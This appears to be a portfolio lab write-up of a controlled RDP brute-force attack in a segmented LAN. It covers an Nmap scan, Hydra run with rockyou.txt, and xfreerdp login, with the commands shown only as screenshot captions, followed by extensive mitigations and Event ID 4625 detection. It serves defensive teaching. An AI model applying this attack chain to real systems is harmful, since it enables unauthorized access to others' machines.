Cybersecurity · RDP Brute Force Attack and Remote Login

RDP Brute Force Attack and Remote Login

Use Hydra to brute-force RDP on Windows 10, then verify access by logging in with xfreerdp.

View this project on GitHub

Overview

This lab demonstrates a controlled brute-force attack against RDP in a segmented LAN. After enumerating the target, Hydra is used with a wordlist to attempt credential discovery. Upon success, xfreerdp confirms interactive access.

Scan Port 3389 with Nmap

Nmap scan step 1
Nmap scan step 2

Brute Force with Hydra (RDP + rockyou.txt)

Run Hydra against the RDP service using a known username and a wordlist (e.g., rockyou.txt) to attempt password discovery.

Hydra brute force step 1
Hydra brute force step 2
Hydra brute force step 3
Hydra brute force step 4
Hydra brute force step 5
Hydra brute force step 6

Remote Login with xfreerdp

After Hydra identifies valid credentials, initiate an RDP session using xfreerdp to verify access.

Successful login step 1
Successful login step 2
Successful login step 3
Successful login step 4

Ways to Mitigate Against This Attack

There are a handful of ways to mitigate and protect against RDP Brute Forcing attacks. One thing I do want to point out is that a strategic attacker would likely think twice about carrying out this activity if their goal is to remain stealthy and unnoticed.

When you use a tool like Hydra, it gets really loud and noticeable on a network. A well secured environment with layers of protection would likely catch this immediately in the act.

Account Lockout Policy

Implementing an account lockout policy is one of the most direct administrative settings to defend against this. If the account locks after 5 or 10 failed attempts, Hydra can't iterate through the wordlist, effectively putting a stop to the brute force activity.

MFA - Multi-Factor Authentication on RDP

In a scenario where Hydra effectively recovers the correct account password, MFA implemented on an RDP session makes the credential alone useless. This is increasingly becoming the standard for any internet-facing remote access.

Don't Expose RDP Directly to the Internet

Port 3389 should never be open to the public internet. The proper approach is putting RDP behind a VPN, where you have to authenticate to the VPN first before you can even reach the RDP port. This removes the attack surface entirely for external attackers.

Change the Default RDP Port

If you want to go the extra mile, you could change the default RDP port. There are tools that can detect if the RDP service is running on a different port, but changing from 3389 to a non-standard port makes it less obvious that RDP is being used when reading the results of a network scan. This is more of a security through obscurity approach, not necessarily a full solution.

Network Level Authentication - NLA

NLA enforces that clients authenticate prior to initiating a full RDP session. This goes a long way in limiting exposure, with unauthenticated users not being able to reach the login screen, effectively reducing the attack surface and making brute forcing more difficult to carry out.

Firewall/IP Allowlisting

Restricting RDP access to specific known IP ranges means an attacker coming from an unknown IP can't even reach the service to attempt a login. This in conjunction with setting up RDP through a VPN goes a long way in effective mitigation.

Detection

Windows Event ID 4625 logs failed logon attempts. A burst of 4625 events from a single source in a short window is a textbook Hydra signature that any SIEM should be alerting on.

Core Takeaway: RDP brute forcing is a loud, detectable attack. An account lockout policy alone is enough to stop Hydra cold, and layering in MFA, VPN-gated access, NLA, and SIEM alerting on Event ID 4625 makes this attack chain extremely difficult to carry out successfully against a hardened environment.
← Back to Home